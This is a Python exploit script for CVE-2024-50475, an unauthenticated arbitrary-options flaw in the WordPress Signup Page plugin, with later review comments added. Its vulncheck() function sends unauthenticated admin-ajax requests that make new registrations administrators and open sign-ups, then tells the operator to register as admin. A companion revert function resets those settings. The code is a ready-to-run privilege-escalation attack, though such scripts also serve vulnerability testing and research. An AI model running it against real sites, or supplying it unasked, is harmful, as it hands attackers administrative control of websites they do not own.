#!/usr/bin/env python3
import argparse
import requests
from getpass import getpass
from bs4 import BeautifulSoup
import os
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silences the InsecureRequestWarning that the verify=False requests below
# would otherwise print for every unverified TLS connection.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
## Exploit script by @RandomRobbieBF
# Browser-like User-Agent attached to every request made by this script.
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
# Shared session used for the admin-ajax POSTs in undoadmin() and vulncheck().
session = requests.Session()
# Optional proxy for traffic inspection; empty by default.
# NOTE(review): these two assignments run at import time and overwrite any
# HTTP_PROXY / HTTPS_PROXY already present in the environment, even when
# http_proxy is "" -- an externally configured proxy is therefore discarded.
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy
def undoadmin(url):
    """Revert the registration options that vulncheck() changes.

    Sends two unauthenticated POSTs to the plugin's ``signup_page_update``
    AJAX action, setting ``default_role`` back to ``subscriber`` and
    ``users_can_register`` to ``0``, then fetches the login page's
    ``action=register`` view to confirm sign-ups are closed.

    Args:
        url: Site base URL. It is joined to ``/wp-admin/admin-ajax.php`` and
            ``/wp-login.php`` with a literal ``/``, so a trailing slash on
            ``url`` yields a double slash in the request path.

    Raises:
        requests.HTTPError: from ``raise_for_status()`` when an AJAX response
            has a 4xx/5xx status.

    Side effects: prints progress messages and calls ``exit()`` if the
    registration page still looks open afterwards.
    """
    # Perform vulnerability check logic here
    print("Vulnerability check:", url)
    # One option write per payload: the option name travels in ``option_key``
    # and the new value in ``signups``.
    payloads = [{"option_key":"default_role","action":"signup_page_update","signups":"subscriber"},{"option_key":"users_can_register","action":"signup_page_update","signups":"0"}]
    main_url = f"{url}/wp-admin/admin-ajax.php"
    for payload in payloads:
        # verify=False disables TLS certificate validation for this request.
        ajax_response = session.post(main_url,data=payload, headers={"User-Agent": user_agent,"X-Requested-With": "XMLHttpRequest"},verify=False)
        ajax_response.raise_for_status()
        # Check if option set successfully
        # NOTE(review): raise_for_status() has already raised for 4xx/5xx, so
        # the else branch below is reachable only for non-200 codes below 400.
        # A 200 reflects the HTTP status only; the response body is never
        # inspected, so "set successfully" is not confirmed by the server reply.
        if ajax_response.status_code == 200:
            print(f"Option set successfully: {main_url}")
        else:
            print(f"Failed to set option: {main_url}")
            exit()
    # Check if user registration is allowed
    register_url = f"{url}/wp-login.php?action=register"
    # Uses module-level requests.get rather than the shared ``session``, so
    # nothing stored on ``session`` accompanies this GET. Also verify=False.
    register_response = requests.get(register_url, headers={"User-Agent": user_agent},verify=False)
    # Presence of this string is treated as "registration form is shown";
    # the check is a plain substring match on the page text.
    if "Registration confirmation will be emailed to you" in register_response.text:
        print("Error: it looks like you can still register.")
        exit()
    else:
        print("Fixed: You can not longer register")
def vulncheck(url):
    """Probe the target for the missing capability check (see DESCRIPTION).

    Sends two unauthenticated POSTs to the plugin's ``signup_page_update``
    AJAX action that set ``default_role`` to ``administrator`` and
    ``users_can_register`` to ``1``, then fetches the login page's
    ``action=register`` view to see whether the registration form is shown.
    If the POSTs are accepted the site's settings are actually modified;
    undoadmin() is the paired revert.

    From a defender's side, the indicator is an unauthenticated POST to
    ``/wp-admin/admin-ajax.php`` carrying ``action=signup_page_update``
    together with an ``option_key`` field; per DESCRIPTION every plugin
    version up to and including 1.0 accepts it without a capability check.

    Args:
        url: Site base URL, joined to the WordPress paths with a literal ``/``
            (a trailing slash on ``url`` produces a double slash).

    Raises:
        requests.HTTPError: from ``raise_for_status()`` when an AJAX response
            has a 4xx/5xx status.

    Side effects: prints progress messages and calls ``exit()`` when the
    registration form is detected.
    """
    # Perform vulnerability check logic here
    print("Vulnerability check:", url)
    # One option write per payload: the option name travels in ``option_key``
    # and the new value in ``signups``.
    payloads = [{"option_key":"default_role","action":"signup_page_update","signups":"administrator"},{"option_key":"users_can_register","action":"signup_page_update","signups":"1"}]
    main_url = f"{url}/wp-admin/admin-ajax.php"
    for payload in payloads:
        # verify=False disables TLS certificate validation for this request.
        # Header set differs from undoadmin(): Content-Type here,
        # X-Requested-With there.
        ajax_response = session.post(main_url,data=payload, headers={"User-Agent": user_agent,"Content-Type":"application/x-www-form-urlencoded"},verify=False)
        ajax_response.raise_for_status()
        # Check if option set successfully
        # NOTE(review): raise_for_status() has already raised for 4xx/5xx, so
        # the else branch below is reachable only for non-200 codes below 400.
        # A 200 reflects the HTTP status only; the response body is never
        # inspected, so the option write is not confirmed by the server reply.
        if ajax_response.status_code == 200:
            print(f"Option set successfully: {main_url}")
        else:
            print(f"Failed to set option: {main_url}")
            exit()
    # Check if user registration is allowed
    register_url = f"{url}/wp-login.php?action=register"
    # Uses module-level requests.get rather than the shared ``session``, so
    # nothing stored on ``session`` accompanies this GET. Also verify=False.
    register_response = requests.get(register_url, headers={"User-Agent": user_agent},verify=False)
    # Plain substring match on the page text decides the outcome; the message
    # printed on the success path tells the operator to run the revert.
    if "Registration confirmation will be emailed to you" in register_response.text:
        print("You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.")
        exit()
    else:
        print("Registration is not avaliable for some reason could be a multisite?")
# Add the vulnerability description as a comment
# Shown as the argparse description (``-h``); it is the CVE summary quoted
# by the author and is not otherwise used by the code.
DESCRIPTION = """
CVE-2024-50475 | Signup Page <= 1.0 - Unauthenticated Arbitrary Options Update
The Signup Page plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
"""
# Use argparse to get the URL, username, and password arguments
# NOTE(review): only --url and --fix are defined below; despite the comment
# above, no username or password arguments exist and the ``getpass`` and
# ``BeautifulSoup`` imports at the top are unused here.
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-u", "--url", help="Website URL", required=True)
# --fix takes a value (vulncheck()'s message suggests ``--fix yes``); any
# non-empty value selects the revert path, there is no validation of it.
parser.add_argument("-f", "--fix", help="Reset after Exploit")
args = parser.parse_args()
# Usage
# Runs at import time: parse_args() and the selected function execute as
# soon as the module is loaded (no ``if __name__ == "__main__":`` guard).
if args.fix:
    undoadmin(args.url)
else:
    vulncheck(args.url)